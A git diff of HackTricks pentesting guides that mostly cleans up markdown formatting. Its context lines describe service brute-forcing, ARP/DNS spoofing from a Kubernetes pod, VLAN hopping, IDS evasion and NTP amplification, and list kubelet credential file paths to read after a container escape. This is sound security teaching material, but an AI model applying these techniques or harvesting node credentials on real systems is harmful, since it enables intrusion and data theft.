@@ -52,8 +52,8 @@ If only password is configured the username used is "**default**".\ Also, note that there is **no way to find externally** if Redis was configured with only password or username+password. {% endhint %} -In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../brute-force.md#redis) **\*\*it.**\ -**In case you found valid credentials you need to** authenticate the session\*\* after establishing the connection with the command: +In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../brute-force.md#redis) it.**\ +**In case you found valid credentials you need to** authenticate the session** after establishing the connection with the command: ```bash AUTH @@ -117,7 +117,7 @@ HGET [ ... Get hash item ... ] ``` -**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)\*\*\*\* +**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) ## Redis RCE diff --git a/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 5570f7bf..c6b4713f 100644 --- a/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -71,5 +71,5 @@ Module options (exploit/multi/http/tomcat_mgr_deploy): nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ``` -### \*\*\*\*[**Brute force**](../brute-force.md#ajp)\*\*\*\* +### [**Brute force**](../brute-force.md#ajp) diff --git a/pentesting/873-pentesting-rsync.md b/pentesting/873-pentesting-rsync.md index e5e248eb..1e4a6df7 100644 --- a/pentesting/873-pentesting-rsync.md +++ b/pentesting/873-pentesting-rsync.md 
@@ -54,7 +54,7 @@ rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 Notice that it could be configured a shared name to not be listed. So there could be something **hidden**.\ Notice that it may be some **shared names** being listed where you need some (different) **credentials** to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those. -### ****[**Brute force**](../brute-force.md#rsync) +### [**Brute force**](../brute-force.md#rsync) ### Manual Rsync diff --git a/pentesting/9200-pentesting-elasticsearch.md b/pentesting/9200-pentesting-elasticsearch.md index 2f37e81e..0bf49e11 100644 --- a/pentesting/9200-pentesting-elasticsearch.md +++ b/pentesting/9200-pentesting-elasticsearch.md @@ -97,7 +97,7 @@ Here are some endpoints that you can **access via GET** to **obtain** some **inf These endpoints were [**taken from the documentation**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) where you can **find more**.\ Also, if you access `/_cat` the response will contain the `/_cat/*` endpoints supported by the instance. -In `/_security/user` (if auth enabled) you can see which user has role `superuser`. +In `/_security/user` (if auth enabled) you can see which user has role `superuser`. ### Indices diff --git a/pentesting/cassandra.md b/pentesting/cassandra.md index bf1ca4ce..d35ca094 100644 --- a/pentesting/cassandra.md +++ b/pentesting/cassandra.md @@ -40,9 +40,9 @@ There aren't much options here and nmap doesn't obtain much info nmap -sV --script cassandra-info -p ``` -### ****[**Brute force**](../brute-force.md#cassandra)**** +### [**Brute force**](../brute-force.md#cassandra) ### **Shodan** `port:9160 Cluster`\ -****`port:9042 "Invalid or unsupported protocol version"` +`port:9042 "Invalid or unsupported protocol version"` 
diff --git a/pentesting/pentesting-ftp/README.md b/pentesting/pentesting-ftp/README.md index 47db5811..db388aa3 100644 --- a/pentesting/pentesting-ftp/README.md +++ b/pentesting/pentesting-ftp/README.md @@ -151,7 +151,7 @@ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all Some FTP servers allow the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server. -[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md)\*\*\*\* +[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md) You could also abuse this behaviour to make a FTP server interact with other protocols. You could **upload a file containing an HTTP request** and make the vulnerable FTP server **send it to an arbitrary HTTP server** (_maybe to add a new admin user?_) or even upload a FTP request and make the vulnerable FTP server download a file for a different FTP server.\ The theory is easy: diff --git a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md index d94ae2b6..700939ba 100644 --- a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md 
@@ -15,7 +15,7 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit Normally this debugger is run on port 8000 and if you establish a TCP connection with the port and send "**JDWP-Handshake**", the server should respond you with the same string.\ Also, you can check this string in the network to find possible JDWP services. -Listing **processes**, if you find the string "**jdwk**" inside a **java process**, probably it has active the \*\*Java Debug Wired Protocol \*\*and you may be able to move laterally or even **escalate privileges** (if executed as root). +Listing **processes**, if you find the string "**jdwk**" inside a **java process**, probably it has active the **Java Debug Wired Protocol **and you may be able to move laterally or even **escalate privileges** (if executed as root). ## More details @@ -66,7 +66,7 @@ An experienced security auditor may have already realised that such a simple han The Length and Id fields are rather self explanatory. The Flag field is only used to distinguish request packets from replies, a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command as shown in the following table.\ \\ -| **CommandSet** | \*\* Command\*\* | +| **CommandSet** | ** Command** | | -------------- | ---------------------------------------------------------------------------------------------------------------- | | 0x40 | Action to be taken by the JVM (e.g. setting a BreakPoint) | | 0x40–0x7F | Provide event information to the debugger (e.g. the JVM has hit a BreakPoint and is waiting for further actions) | @@ -190,7 +190,7 @@ These are just a few ways to discover open JDWP services on the Internet. This i **Thanks**\ \ -\*\*\*\*I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests. +I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests. ### **References:** 
diff --git a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index bce69e9d..37cfb2f1 100644 --- a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -24,4 +24,4 @@ Based on the **heracles.sh script** (from the paper) a C tool you can use (creat /tmp/tickey -i ``` -**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**** +**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md index b8665aa8..5a3a5073 100644 --- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md +++ b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md 
@@ -88,7 +88,7 @@ In case the **compromised pod is running some sensitive service** where other po ## Network Spoofing By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET\_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**\ -****Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**. +Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**. {% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md" %} [kubernetes-network-attacks.md](../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) @@ -121,7 +121,7 @@ If you managed to **escape from the container** there are some interesting thing * The whole **filesystem** and **OS** in general * The **Kube-Proxy** service listening * The **Kubelet** service listening. Check config files: - * Directory: `/var/lib/kubelet/` + * Directory: `/var/lib/kubelet/` * `/var/lib/kubelet/kubeconfig` * `/var/lib/kubelet/kubelet.conf` * `/var/lib/kubelet/config.yaml` @@ -135,7 +135,7 @@ If you managed to **escape from the container** there are some interesting thing ### Find node kubeconfig -If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**: +If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**: ``` ps -ef | grep kubelet 
@@ -243,7 +243,7 @@ In order to create a static pod you may just need to **save the yaml configurati The **path to the folder** where you should write the pods is given by the parameter **`--pod-manifest-path` of the kubelet process**. If it isn't set you might need to set it and restart the process to abuse this technique. -**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from **** [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): +**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): ```yaml apiVersion: v1 @@ -273,7 +273,7 @@ spec: ## Automatic Tools -* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)**** +* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates) ``` Peirates v1.1.8-beta by InGuardians diff --git a/pentesting/pentesting-kubernetes/kubernetes-basics.md b/pentesting/pentesting-kubernetes/kubernetes-basics.md index 09a084d8..2223db59 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-basics.md +++ b/pentesting/pentesting-kubernetes/kubernetes-basics.md 
@@ -18,7 +18,7 @@ ![](https://sickrov.github.io/media/Screenshot-68.jpg) * **Node**: operating system with pod or pods. - * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. + * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. \ When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` 
@@ -31,7 +31,7 @@ * **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed. * **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod. * **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API. - * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) + * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) * **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack. Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized. 
@@ -47,7 +47,7 @@ When a pod creates data that shouldn't be lost when the pod disappear it should * **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run. * **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**. * **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application. - * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. + * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. * A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed. * When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". 
You can `describe` the ingress controller to get the address of this parameter. * `minikube addons enable ingress` diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md index 9f992d65..7ff12cca 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md +++ b/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md @@ -30,11 +30,11 @@ This tool also has the argument `autofix` to **automatically fix detected issues ### **Kicks** -****[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications +[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications ### Checkov -****[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code. +[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code. It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning. 
@@ -60,7 +60,7 @@ It's very important to **protect the access to the Kubernetes Api Server** as a It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**. **Common Request process:**\ -****User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control. +User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control. **Tips**: @@ -122,7 +122,7 @@ You should update your Kubernetes environment as frequently as necessary to have * Dependencies up to date. * Bug and security patches. -****[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) +[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) **The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):** diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md index 60cb8e5b..7fe24d72 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md +++ b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md 
@@ -1,6 +1,6 @@ # Kubernetes NetworkPolicies -**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html)**** +**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html) ### Scenario Information @@ -111,7 +111,7 @@ kubectl delete networkpolicy web-deny-all A tool/framework to teach you how to create a network policy using the Editor. It explains basic network policy concepts and guides you through the steps needed to achieve the desired least-privilege security and zero-trust concepts. -* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io)**** +* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io) ![Scenario 20 NSP Cilium](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-2.png) diff --git a/pentesting/pentesting-ldap.md b/pentesting/pentesting-ldap.md index e90669c7..d4b9ac45 100644 --- a/pentesting/pentesting-ldap.md +++ b/pentesting/pentesting-ldap.md @@ -293,7 +293,7 @@ done ### Apache Directory -\*\*\*\*[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). +[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). ### jxplorer diff --git a/pentesting/pentesting-mssql-microsoft-sql-server.md b/pentesting/pentesting-mssql-microsoft-sql-server.md index ba72f00a..158094f8 100644 --- a/pentesting/pentesting-mssql-microsoft-sql-server.md +++ b/pentesting/pentesting-mssql-microsoft-sql-server.md 
@@ -7,9 +7,9 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai Discover **The PEASS Family**, our collection of exclusive **NFTs** -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/pentesting/pentesting-mysql.md b/pentesting/pentesting-mysql.md index 3b8d2389..7cf764b4 100644 --- a/pentesting/pentesting-mysql.md +++ b/pentesting/pentesting-mysql.md @@ -3,7 +3,7 @@ ## **Basic Information** **MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**).\ -\_\*\*\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/). +\_**\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/). **Default port:** 3306 diff --git a/pentesting/pentesting-network/README.md b/pentesting/pentesting-network/README.md index b0550abc..f41d1be1 100644 --- a/pentesting/pentesting-network/README.md 
+++ b/pentesting/pentesting-network/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -294,7 +294,7 @@ In modern switches this vulnerability has been fixed. #### Dynamic Trunking -Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) \*\*\*\* can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not. +Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not. If it was discovered that the the network is vulnerable, you can use _**Yersinia**_ to launch an "**enable trunking**" using protocol "**DTP**" and you will be able to see network packets from all the VLANs. @@ -346,7 +346,7 @@ ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up #### Automatic VLAN Hopper -The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)\*\*\*\* +The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) #### Double Tagging 
@@ -429,7 +429,7 @@ You could also use [scapy](https://github.com/secdev/scapy/). Be sure to install Although intended for use by the employees’ Voice over Internet Protocol (VoIP) phones, modern VoIP devices are increasingly integrated with IoT devices. Many employees can now unlock doors using a special phone number, control the room’s thermostat... -The tool [**voiphopper**](http://voiphopper.sourceforge.net) \*\*\*\* mimics the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. It automatically discovers the correct VLAN ID for the voice network using one of the device discovery protocols it supports, such as the Cisco Discovery Protocol (CDP), the Dynamic Host Configuration Protocol (DHCP), Link Layer Discovery Protocol Media Endpoint Discovery (LLDP-MED), and 802.1Q ARP. +The tool [**voiphopper**](http://voiphopper.sourceforge.net) mimics the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. It automatically discovers the correct VLAN ID for the voice network using one of the device discovery protocols it supports, such as the Cisco Discovery Protocol (CDP), the Dynamic Host Configuration Protocol (DHCP), Link Layer Discovery Protocol Media Endpoint Discovery (LLDP-MED), and 802.1Q ARP. **VoIP Hopper** supports **three** CDP modes. The **sniff** mode inspects the network packets and attempts to locate the VLAN ID. To use it, set the **`-c`** parameter to `0`. The **spoof** mode generates custom packets similar to the ones a real VoIP device would transmit in the corporate network. To use it, set the **`-c`** parameter to **`1`**. The spoof with a **pre-madepacket** mode sends the same packets as a Cisco 7971G-GE IP phone. To use it, set the **`-c`** parameter to **`2`**. 
@@ -501,7 +501,7 @@ You can use Responder DHCP script (_/usr/share/responder/DHCP.py_) to establish Here are some of the attack tactics that can be used against 802.1X implementations: * Active brute-force password grinding via EAP -* Attacking the RADIUS server with malformed EAP content _\*\*_(exploits) +* Attacking the RADIUS server with malformed EAP content _**_(exploits) * EAP message capture and offline password cracking (EAP-MD5 and PEAP) * Forcing EAP-MD5 authentication to bypass TLS certificate validation * Injecting malicious network traffic upon authenticating using a hub or similar @@ -538,9 +538,9 @@ Most Open Shortest Path First (OSPF) implementations use MD5 to provide authenti For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_ -_\*\*\*\*_ +__ -You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _\*\*(TODO: Read it all and all new attacks if any)_ +You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _**(TODO: Read it all and all new attacks if any)_ ## **Spoofing** diff --git a/pentesting/pentesting-network/ids-evasion.md b/pentesting/pentesting-network/ids-evasion.md index 188fdd7e..e8846741 100644 --- a/pentesting/pentesting-network/ids-evasion.md +++ b/pentesting/pentesting-network/ids-evasion.md 
@@ -20,7 +20,7 @@ Just fragment the packets and send them. If the IDS/IPS doesn't have the ability ## **Invalid** _**checksum**_ -Sensors usually don't calculate checksum for performance reasons. _****_ So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: +Sensors usually don't calculate checksum for performance reasons. __ So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. diff --git a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md index ec95d281..32c1abae 100644 --- a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md +++ b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md @@ -1,6 +1,6 @@ # Spoofing SSDP and UPnP Devices with EvilSSDP -**This post was copied from** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/)**** +**This post was copied from** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) ## **Introduction** 
@@ -67,24 +67,24 @@ In the **Umap tool section** you can find a way to exploit this vector. ### **Miranda** -****[**Miranda**](https://raw.githubusercontent.com/0x90/miranda-upnp/master/src/miranda.py) **** is a **python2** **UPnP** **client** that can be useful to **discover** UPnP services, get the **details** and **send commands** to them: +[**Miranda**](https://raw.githubusercontent.com/0x90/miranda-upnp/master/src/miranda.py) is a **python2** **UPnP** **client** that can be useful to **discover** UPnP services, get the **details** and **send commands** to them: ``` upnp> msearch Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop... -**************************************************************** + SSDP reply message from 192.168.1.254:49152 XML file is located at http://192.168.1.254:49152/wps_device.xml Device is running Unspecified, UPnP/1.0, Unspecified -**************************************************************** -**************************************************************** + + SSDP reply message from 192.168.1.254:53350 XML file is located at http://192.168.1.254:53350/37699b14/rootDesc.xml Device is running Linux/3.4.11 UPnP/1.0 MiniUPnPd/1.9 -**************************************************************** + upnp> host list [0] 192.168.1.254:49152 
@@ -118,11 +118,11 @@ upnp> host send 0 WFADevice WFAWLANConfig PutMessage ### Umap -The tool [**umap**](https://github.com/0x90/upnp-arsenal/blob/master/umap-bypass.py) **** can help to **discover upnp commands** that are **available** from **WAN** interfaces even if those aren't announced in those interfaces (this is because of buggy implementations). Note that if, for example, you are testing a router and you have access to it from both the internal network and the WAN interface, you should try to **enumerate all the services from the internal** network (using **miranda** for example) and then try to **call those services from the external** network. +The tool [**umap**](https://github.com/0x90/upnp-arsenal/blob/master/umap-bypass.py) can help to **discover upnp commands** that are **available** from **WAN** interfaces even if those aren't announced in those interfaces (this is because of buggy implementations). Note that if, for example, you are testing a router and you have access to it from both the internal network and the WAN interface, you should try to **enumerate all the services from the internal** network (using **miranda** for example) and then try to **call those services from the external** network. ### **Other UPnP Tools** -Find in [**https://github.com/0x90/upnp-arsenal**](https://github.com/0x90/upnp-arsenal) **** more upnp tools +Find in [**https://github.com/0x90/upnp-arsenal**](https://github.com/0x90/upnp-arsenal) more upnp tools ### **Evil SSDP** diff --git a/pentesting/pentesting-ntp.md b/pentesting/pentesting-ntp.md index 152b6646..99cc7162 100644 --- a/pentesting/pentesting-ntp.md +++ b/pentesting/pentesting-ntp.md 
@@ -33,7 +33,7 @@ nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 1 ## NTP Amplification Attack -\*\*\*\*[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) +[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) NTP protocol by design uses UDP to operate, which does not require any handshake like TCP, thus no record of the request. So, NTP DDoS amplification attack begins when an attacker crafts packets with a spoofed source IP to make the packets appear to be coming from the intended target and sends them to NTP server. Attacker initially crafts the packet of few bytes, but NTP responds with a large amount of data thus adding to amplification of this attack. diff --git a/pentesting/pentesting-postgresql.md b/pentesting/pentesting-postgresql.md index cd5d950a..ca23e327 100644 --- a/pentesting/pentesting-postgresql.md +++ b/pentesting/pentesting-postgresql.md @@ -2,7 +2,7 @@ ## **Basic Information** -**PostgreSQL** is an _\*\*_open source object-relational database system that uses and extends the SQL language. +**PostgreSQL** is an _**_open source object-relational database system that uses and extends the SQL language. **Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use. diff --git a/pentesting/pentesting-printers/README.md b/pentesting/pentesting-printers/README.md index 8408ebf2..ed4c383f 100644 --- a/pentesting/pentesting-printers/README.md +++ b/pentesting/pentesting-printers/README.md 
